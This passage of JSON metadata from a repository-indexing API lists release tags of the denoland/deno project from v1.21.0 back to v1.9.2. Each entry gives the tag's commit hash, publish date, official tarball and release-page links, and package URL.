ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7